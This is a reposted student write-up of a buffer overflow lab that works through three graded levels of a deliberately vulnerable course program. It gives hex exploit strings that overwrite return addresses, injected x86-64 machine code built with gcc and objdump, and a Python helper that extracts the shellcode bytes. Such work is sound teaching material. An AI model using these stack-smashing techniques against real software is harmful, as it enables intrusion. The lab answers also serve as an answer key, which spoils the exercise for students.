Buffer Overflows Lab

The stack looks roughly like this:

Level 0: Candle

It is enough to overwrite the return address.

For example:

c0 10 40 00 00 00 00 00 c0 10 40 00 00 00 00 00 c0 10 40 00 00 00 00 00 c0 10 40 00 00 00 00 00 c0 10 40 00 00 00 00 00 c0 10 40 00 00 00 00 00 c0 10 40 00 00 00 00 00 c0 10 40 00 00 00 00 00 

Level 1: Sparkler

The goal is to make arg equal to the cookie value.

c0 10 40 00 00 00 00 00 c0 10 40 00 00 00 00 00 c0 10 40 00 00 00 00 00 c0 10 40 00 00 00 00 00 c0 10 40 00 00 00 00 00 c0 10 40 00 00 00 00 00 c0 10 40 00 00 00 00 00 70 10 40 00 00 00 00 00 b6 c4 fd 29 b2 96 02 3f b6 c4 fd 29 b2 96 02 3f

Level 2: Firecracker

The goal is to set the global value in bang to the cookie value.

The idea: first return into a specific code segment on the stack, run our code that replaces the global value, then return to the bang function.

The assembly that replaces the global is:

mov 0x602320, %rsi 
mov %rsi, 0x602308
push $0x00401020
retq

Assemble it and disassemble the object to get the machine code:

$ gcc -c test.s
$ objdump -d test.o > test.d

The resulting disassembly:

test.o:     file format elf64-x86-64


Disassembly of section .text:

0000000000000000 <.text>:
   0:    48 8b 34 25 20 23 60     mov    0x602320,%rsi
   7:    00 
   8:    48 89 34 25 08 23 60     mov    %rsi,0x602308
   f:    00 
  10:    68 20 10 40 00           pushq  $0x401020
  15:    c3                       retq   

Then insert this machine code into the specific stack segment:

48 8b 34 25 20 23 60 00 48 89 34 25 08 23 60 00 68 20 10 40 00 c3 00 00 c0 10 40 00 00 00 00 00 c0 10 40 00 00 00 00 00 c0 10 40 00 00 00 00 00 c0 10 40 00 00 00 00 00 00 b7 ff ff ff 7f 00 00

That does it.
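
As an added example (not part of the original post), a small Python helper that automates the step above of reading the machine code bytes out of the objdump listing, and checks that the offsets are contiguous so a wrapped or truncated line is caught rather than silently producing wrong bytes. The listing embedded in it is the one shown above, with objdump's tabs replaced by spaces.

```python
import re

# Constructed sample: the `objdump -d test.o` listing from the post above,
# with objdump's tabs between the columns replaced by spaces.
OBJDUMP_LISTING = """\
test.o:     file format elf64-x86-64

Disassembly of section .text:

0000000000000000 <.text>:
   0:    48 8b 34 25 20 23 60     mov    0x602320,%rsi
   7:    00
   8:    48 89 34 25 08 23 60     mov    %rsi,0x602308
   f:    00
  10:    68 20 10 40 00           pushq  $0x401020
  15:    c3                       retq
"""

# An instruction line: indent, hex offset, colon, then bytes and mnemonic.
_LINE_RE = re.compile(r"^\s*([0-9a-f]+):\s+(.*)$")
_BYTE_RE = re.compile(r"^[0-9a-f]{2}$")

def objdump_to_bytes(listing: str) -> bytes:
    """Recover raw machine code from an `objdump -d` listing.

    Only the hex byte column is kept. Offsets must be contiguous, so a
    wrapped or truncated line raises instead of yielding wrong bytes.
    """
    code = bytearray()
    for line in listing.splitlines():
        m = _LINE_RE.match(line)
        if not m:
            continue  # file header, section header, blank lines
        offset = int(m.group(1), 16)
        if offset != len(code):
            raise ValueError(f"gap at {offset:#x}: have {len(code)} bytes")
        for tok in m.group(2).split():
            if not _BYTE_RE.match(tok):
                break  # the first non-byte token is the mnemonic
            code.append(int(tok, 16))
    return bytes(code)

def to_hex_string(code: bytes) -> str:
    """Space-separated lowercase hex, the form the lab's exploit strings use."""
    return " ".join(f"{b:02x}" for b in code)

if __name__ == "__main__":
    blob = objdump_to_bytes(OBJDUMP_LISTING)
    print(len(blob), "bytes:", to_hex_string(blob))
```

The 22 bytes it returns are exactly the prefix of the stack payload above.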

Extra Credit – Level 3: Dynamite: to be done next time.

2015-09-28

Reposted from: https://www.cnblogs.com/whuyt/p/4843782.html